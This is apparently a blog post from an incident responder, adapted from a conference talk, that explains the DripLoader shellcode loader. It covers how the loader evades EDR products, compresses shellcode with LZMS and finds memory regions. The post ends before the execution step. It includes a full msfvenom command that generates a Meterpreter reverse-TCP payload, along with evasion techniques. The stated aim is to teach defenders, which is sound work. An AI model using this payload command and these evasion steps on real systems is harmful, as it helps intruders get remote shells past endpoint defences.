Introduction

On December 6th, 2024, I had the privilege of speaking at BSides Austin, where my talk focused on the subject of this blog: shellcode execution and evasion. With a professional background in incident response, I’ve had the opportunity to see both sides of the coin—how attackers challenge defenders and how defenders respond to those challenges.

To become a stronger defender, it’s crucial to understand how attackers can exploit blind spots in our defenses. The shellcode loader DripLoader (PoC) has provided valuable insights into how attackers can bypass the very tools we rely on. I hope you find this blog both informative and a meaningful addition to your growing knowledge toolkit.

DripLoader Introduction

The concept of DripLoader was introduced three years ago (at the time of this blog) by an author known as xuanxuan0. What’s fascinating is that this project remains effective even after three years in a constantly evolving industry. It highlights a vulnerability in certain EDR products that struggle to address issues attackers can exploit, potentially deceiving defenders for years. Figure 1. The PoC github repo made by xuanxuan0

• GitHub Repo

What Is a Shellcode Loader?

A shellcode loader achieves four key objectives, which are outlined below. This blog will explain each concept in detail and demonstrate how DripLoader can accomplish them.

1. Locate or allocate memory.
2. Copy shellcode.
3. Make it executable.
4. Execute.

Generate Shellcode

DripLoader is compatible with most C2 frameworks. For this blog, I will be using Meterpreter. As a proof of concept, it serves as an excellent demonstration. Meterpreter is a widely recognized and reliable C2 that has stood the test of time. We will use MSFVenom to generate the C code that DripLoader will utilize.

• Command → msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=[Desired Listening Host] LPORT=[Desired Port] -f c Figure 2. MSFvenom is used to generate Meterpreter shellcode.

Compressing Shellcode

When uncompressed shellcode resides on an endpoint, EDR solutions typically flag it as suspicious and nuke it. To execute the shellcode on a host, we must place a file on the endpoint. For my proof of concept (PoC), we will utilize LZMS which is an excellent choice because its Compression API is tailored for professional C/C++ developers, this aligns well with the fact that this loader is written in C. Additionally, Microsoft documentation highlights numerous benefits of LZMS, as shown in Figure 3. Figure 3. C code that shows how we compress the desired shellcode. Figure 4. Microsoft Documentation on why LZMS is the most desirable compression method.

• Microsoft Documentation

Step 1. Load the uncompressed shellcode

In the shellcode header file, place the uncompressed shellcode in the UCHAR UNCOMPRESSED_SHELLCODE[] array. It’s also crucial to specify the shellcode length in the SHELLCODE_LENGTH variable. This length will be used later to allocate the required memory and facilitate the drip process.

Figure 5. A snippet of code from shellcode.h

Step 2. Compile CompressShellcode.exe and execute

Next, we can compile and execute the binary to obtain the LZMS-compressed shellcode. Once we have the compressed shellcode, we can store it in the UCHAR SHELLCODE[] array.

Figure 6. The compressed shellcode is placed in the correct array.

Allocating Memory

The original author has provided a set of memory instructions that are compatible with DripLoader, which works perfectly for this proof of concept. Figure 7. xuanxuan0 predefined memory region.

We will use the system call NtQueryVirtualMemory to check if any of the predefined memory regions have enough space to allocate the shellcode loaded in shellcode.h. Figure 8. Snippet of the NtQueryVirtualMemory call Figure 9. For loop to see if there is enough space in the desired region.

Copy shellcode and making it executable.